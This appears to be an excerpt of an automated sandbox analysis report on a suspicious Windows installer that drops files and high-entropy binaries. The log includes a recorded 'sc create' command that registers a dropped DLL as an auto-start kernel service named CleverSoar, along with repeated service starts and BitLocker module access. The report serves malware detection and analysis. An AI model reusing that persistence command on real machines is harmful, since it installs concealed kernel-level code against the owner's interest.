Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic file information: File size 5707631 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2195342849.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2196177862.0000000001250000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_005E57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: real checksum: 0x0 should be: 0x57286f
Source: update.vac.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.7.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drStatic PE information: section name: .didata
Source: 7zr.exe.7.drStatic PE information: section name: .sxdata
Source: update.vac.7.drStatic PE information: section name: .00cfg
Source: update.vac.7.drStatic PE information: section name: .voltbl
Source: update.vac.7.drStatic PE information: section name: .=~
Source: is-8UMQQ.tmp.7.drStatic PE information: section name: .xdata
Source: hrsw.vbc.7.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.7.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.7.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C86EB push ecx; ret 7_2_6C0C86FE
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF70F00 push ss; retn 0001h7_2_6BF70F0A
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C196F10 push eax; ret 7_2_6C196F2E
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0FB9F4 push 004AC35Ch; ret 7_2_6C0FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C197290 push eax; ret 7_2_6C1972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005645F4 push 0060C35Ch; ret 11_2_0056460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FFB10 push eax; ret 11_2_005FFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FFE90 push eax; ret 11_2_005FFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\is-8UMQQ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
